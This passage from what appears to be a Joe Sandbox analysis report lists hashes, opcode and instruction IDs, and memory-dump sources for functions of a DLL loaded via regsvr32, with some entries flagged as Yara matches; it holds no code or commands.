                                                                                                                                      • Instruction Fuzzy Hash: 49419FB090034E8FCB45CF64D48A5DEBFF0FB68788F204619E855A6220D37496A9CFD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X
                                                                                                                                      • API String ID: 0-1684620495
                                                                                                                                      • Opcode ID: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                                                                                      • Instruction ID: 6a57ff0d0e6417dcb220414ddd6fd05f9d25965c1474ecef6a781787815c5441
                                                                                                                                      • Opcode Fuzzy Hash: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                                                                                      • Instruction Fuzzy Hash: 0F317FB06187858B8348DF28C45A41ABBE1FB8D31DF504B1DF8CAA7390D738D656CB4A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: GfMu
                                                                                                                                      • API String ID: 0-241548529
                                                                                                                                      • Opcode ID: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                                                                                      • Instruction ID: 459bd1ae445ea4b99a05d17f5b7f57a0228a98ad0e4316bc4572b1ae85115cb6
                                                                                                                                      • Opcode Fuzzy Hash: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                                                                                      • Instruction Fuzzy Hash: 3F31A4B080034E9FCB44DF65C88A5DE7FB0FB28398F118619E859A6254D3B8D6A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: k|
                                                                                                                                      • API String ID: 0-998972391
                                                                                                                                      • Opcode ID: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                                                                                      • Instruction ID: 2ac7c004f44a328b632a383646e80911aebdd3a2d92afb1c4fde4e6b566515e4
                                                                                                                                      • Opcode Fuzzy Hash: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                                                                                      • Instruction Fuzzy Hash: 0E316BB55187858BC348DF28C44A41ABBE0FB8D70DF401B2EF4CAAA254D778D646CB4B
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: wz_
                                                                                                                                      • API String ID: 0-2163964638
                                                                                                                                      • Opcode ID: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                                                                                      • Instruction ID: 85abef5d63a3cc0fc3de64b3cbe2355aa0dee9f977196367498a1db9d5329f65
                                                                                                                                      • Opcode Fuzzy Hash: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                                                                                      • Instruction Fuzzy Hash: 1B31A3B190438E9FCB84CF64D88A5DE7BB0FB58358F104A19EC69A6210D3B4C665CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: {?Q
                                                                                                                                      • API String ID: 0-927583641
                                                                                                                                      • Opcode ID: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                                                                                      • Instruction ID: 7795a7564029993a5c8c4ac1e25182a2d51a1c6f7b8e281b16b6dc8244c6ef4e
                                                                                                                                      • Opcode Fuzzy Hash: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                                                                                      • Instruction Fuzzy Hash: A431A4B4529780ABC788DF28C49691EBBF1FBC9314F806A1CF9868A350D775D855CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: |}6\
                                                                                                                                      • API String ID: 0-3074799505
                                                                                                                                      • Opcode ID: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                                                                                      • Instruction ID: deee1345628e574e08842a382b14917b2dc53efdf1581624b2725d4aab218cc2
                                                                                                                                      • Opcode Fuzzy Hash: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                                                                                      • Instruction Fuzzy Hash: 06216EB4529380AB8388DF29C48981EBBF0FBC9344F906A1EF88696364D775D445CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 3&a
                                                                                                                                      • API String ID: 0-537350193
                                                                                                                                      • Opcode ID: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                                                                                      • Instruction ID: 8a645f8d3c8cc56bac308d2d2ecdfd486002fa9c5fd877c3d873e02a569d50ca
                                                                                                                                      • Opcode Fuzzy Hash: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                                                                                      • Instruction Fuzzy Hash: 39216E74528781AFC788DF28D49981FBBE1FB88304F806A1DF88687360D774D459CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: o0:X
                                                                                                                                      • API String ID: 0-645126758
                                                                                                                                      • Opcode ID: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                                                                                      • Instruction ID: 22f452758bb10e6d75f49cffb2921ccf5c0237a957934827f7fc810dfbc33e73
                                                                                                                                      • Opcode Fuzzy Hash: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                                                                                      • Instruction Fuzzy Hash: AC2168B060C7848BD348DF68C49691ABBE0FB9D358F504B1DF4CAAA261D3789645CB4A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: D4}
                                                                                                                                      • API String ID: 0-491520632
                                                                                                                                      • Opcode ID: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                                                                                      • Instruction ID: bbb3bee9fa9cdc8f6282772afd18f295cdd348f2c7f059baa6db29b6d6e0bb5b
                                                                                                                                      • Opcode Fuzzy Hash: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                                                                                      • Instruction Fuzzy Hash: A9215DB550C3848BC788DF28C49651BBBE1BB8C318F444B2DF4CAAA365D7789654CF4A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate_errno_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1583075380-0
                                                                                                                                      • Opcode ID: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                                                                                      • Instruction ID: f5f36441d0883d0f4c8dc1929f156c12cc93370f9f70154e2892f14d48163bdd
                                                                                                                                      • Opcode Fuzzy Hash: b49a52df605eb860e81aecf945551c905b422740176ff48a34f4eb53aef691de
                                                                                                                                      • Instruction Fuzzy Hash: 41A1C232F1868545EB64DF2596157AFB392AB94BC0F048177DE4DABA4ADF7CE001CB01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                                                                                      • Instruction ID: e227e367aec675c1632a23e97b781c504e82eabc650419af1904080f9c72e8e0
                                                                                                                                      • Opcode Fuzzy Hash: d9410001777fc81e6582bcbf2c9e1b051a8f1f2b874c05684980e9ac5d71aab9
                                                                                                                                      • Instruction Fuzzy Hash: 8071CF72F182424FE71CCB18E95177866D6EBF4305F588077D50ACAA94FABAF9008F01
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                                                                                      • Instruction ID: 8540b9e78b3a5a21de6b0995fa07f246b5a6616f24314d9c292e70c997d69f1a
                                                                                                                                      • Opcode Fuzzy Hash: 5d0a71211182b7f87b6da8fb5c4bb16c050ce1c1bc57c3eb72ccfc764dcd8f25
                                                                                                                                      • Instruction Fuzzy Hash: 03916670904B0D8BDF48DF94C48A1EEBBF1FB48358F15821DE84AA7250DB749A89CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                                                                                      • Instruction ID: b4cc55b2ba55f7836136ac8b5ed3643aad821ec95d31101853fef74eb9d9cec8
                                                                                                                                      • Opcode Fuzzy Hash: efccbdecd07d61b7fd9807909e593046fc70b22fd17ef27bebbdee29ceef9f7a
                                                                                                                                      • Instruction Fuzzy Hash: FF51787090470DABDBA9CF64C4893EEBBF0FB48354F60806DE85697390DB749A85CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                                                                                      • Instruction ID: 8a210f576f06192acb1348665dce29b8299704b90f8c36c4c02948eefca36544
                                                                                                                                      • Opcode Fuzzy Hash: 1505da822373411ddcecd725c63ebafe53e843356a51ddc09aa4b8a95d314011
                                                                                                                                      • Instruction Fuzzy Hash: 98819EB590034E8FCB48CF68C48A5DE7FB0BB68394F614219F8569A260D774DAA5CFC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                                                                                      • Instruction ID: a715a821166c3325a5f96f2d5301173626eb48cd37bd72c2dcb4fea3562e42b3
                                                                                                                                      • Opcode Fuzzy Hash: 197fc001b9ca96d8c078894440fafc4def679aa452f545048d4dbe605d0ae04d
                                                                                                                                      • Instruction Fuzzy Hash: 79512EB150074A8BDB49DF28C0D76AE3FE1EB64388F20411DFD468A295D774DAA9CBC1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2ace7ea2d26746cc3390ccab9d64ee1f2d7dc726b4390747d9cc592a488b98cf
                                                                                                                                      • Instruction ID: fc479b7e82b21315ffd406d8fba444b33d09de74539f70da2a8813263b1569c5
                                                                                                                                      • Opcode Fuzzy Hash: 2ace7ea2d26746cc3390ccab9d64ee1f2d7dc726b4390747d9cc592a488b98cf
                                                                                                                                      • Instruction Fuzzy Hash: 65416D7020DB488FD768DF18948975ABBF0FB9A740F404A9DE5CAC7256D771D844CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                                                                                      • Instruction ID: dbb4fad0742d9b29c59b9a64f17438fc1cba9462e735a4e3b2d00d7b8da19945
                                                                                                                                      • Opcode Fuzzy Hash: 97ae2c8ea2cdf4840b91f894fd37a694475120081486fc145809f74360d0bada
                                                                                                                                      • Instruction Fuzzy Hash: 4C5192B490038E8FCB48CF69C84A5DE7BB1FB48358F104A19FC26A6250D7B4D665CF94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                                                                                      • Instruction ID: 08efbb833ea687ad733901112953304226336fcfa3581264405f9509991f6ff4
                                                                                                                                      • Opcode Fuzzy Hash: f1b44f26b2e4c7e97ddfb81a3adbda3d77288edc4ecbe0bae8cc8933f1c33e44
                                                                                                                                      • Instruction Fuzzy Hash: 6551BEB490074A8BCB48CF68D4875DE7FB0FB68398F20421DEC56AA250D3B496A5CFD4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                                                                                      • Instruction ID: 52c1f8436ada09c5d91cc0f6a0e49c089501cc81ef075f7e28a52ff611ebfcf9
                                                                                                                                      • Opcode Fuzzy Hash: 16eb5be53274359ca32061ddf2fd9752b6767c1a5dd3248deb14ec1aa5e29bf1
                                                                                                                                      • Instruction Fuzzy Hash: D351B3B190438E8FCB48DF68D98A5DE7BB0FB48348F104A19FC26A6250D3B4D664CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                                                                                      • Instruction ID: 871f118089c9e262c63038bd4f0fd9666d89e9c6fa6f13266ea976bdce614408
                                                                                                                                      • Opcode Fuzzy Hash: bcde6b28aa1f9cc532f581acc23668cd4c3c6920105dcd3780d199daaa58310a
                                                                                                                                      • Instruction Fuzzy Hash: CB41393190071DABDB95CFA4C8892EEBBF1FF44358F608159E852A7384DBB49685CF81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                                                                                      • Instruction ID: 72cb41ac5f9990f9c197b8bd4b5430fc958a2c545255f7632808fe9bc15cd904
                                                                                                                                      • Opcode Fuzzy Hash: be6c09d37bb88d9ef1cd1e4f7c6fe28a3503fab801bd979a9297db1a45dede51
                                                                                                                                      • Instruction Fuzzy Hash: A141D27090034A8BCB48DF68D8865DE7FB0FB58388F20461DE81AA6350D3B896A5CBD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                                                                                      • Instruction ID: 5a85513126e01a98bb902dccfe4af02f6196fd3989a765a33a65cbdcda0cb452
                                                                                                                                      • Opcode Fuzzy Hash: 937cbbccdfb62f32f5a53fbe7826fb6fdb7ed657b014fade726fdd4e8827f138
                                                                                                                                      • Instruction Fuzzy Hash: 0641E5B091038A8FCF88DF64D84A5DE7BB0FB58358F104A1DFC65A6250E3B49664CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                                                                                      • Instruction ID: 77361ced58272e7b73a95c704b243c92926a81ca7bf4620d616fd1e275fcbc28
                                                                                                                                      • Opcode Fuzzy Hash: 17a73d98c2b5216e6ebfe3da59b71ff0bc58f6e68d4a2580613c8fab7b77e503
                                                                                                                                      • Instruction Fuzzy Hash: A841D2B190434E8FCB48DF68C4865DE7FF0FB58388F204219E859A6250D3B896A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267295982.00007FFFE22D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFFE22D0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.267290170.00007FFFE22D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267388686.00007FFFE2322000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267426705.00007FFFE2326000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.267483076.00007FFFE2329000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7fffe22d0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3186804695-0
                                                                                                                                      • Opcode ID: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                                                                                      • Instruction ID: ef79fcdf1b6f536821dd02d363f852c3238ffe2810c0c6aa50a0537e67ef9894
                                                                                                                                      • Opcode Fuzzy Hash: 07c06ba19e2310f742034fc51624b2b683580184b74621a532736302abba6d70
                                                                                                                                      • Instruction Fuzzy Hash: 1831F222E1878589EB04DB2AD4193AA77D1EB94BC0F184176EA4D97786EF7CD001CB05
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                                                                                      • Instruction ID: 4f2f4704f2b9e1c234c275d0f4f9a14eb4d491f2b4b6dbd4d57755e8fe2c6edd
                                                                                                                                      • Opcode Fuzzy Hash: d3646060d8cb761d7de136982460322f3472e8f5a21e87ad1ead63779f29ae52
                                                                                                                                      • Instruction Fuzzy Hash: 6341C4B090438ECFCF48CF68C8895CE7BB0FF58358F114A19E825A6250D3B49665CF95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.267070861.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                                                                                      • Instruction ID: 4854a602bbf38c78d9fab67e5db6ce586c5dff59e36b89151347ba9907d49bba
                                                                                                                                      • Opcode Fuzzy Hash: 1d53fd4730f7ea41163b882b7fe0da69ca66e61df5fc81e281dc4420083e2c61
                                                                                                                                      • Instruction Fuzzy Hash: D13189B0529781ABD78CDF28C49981EBBE1FBC8344FC46A2DF9868B350D7749405CB46
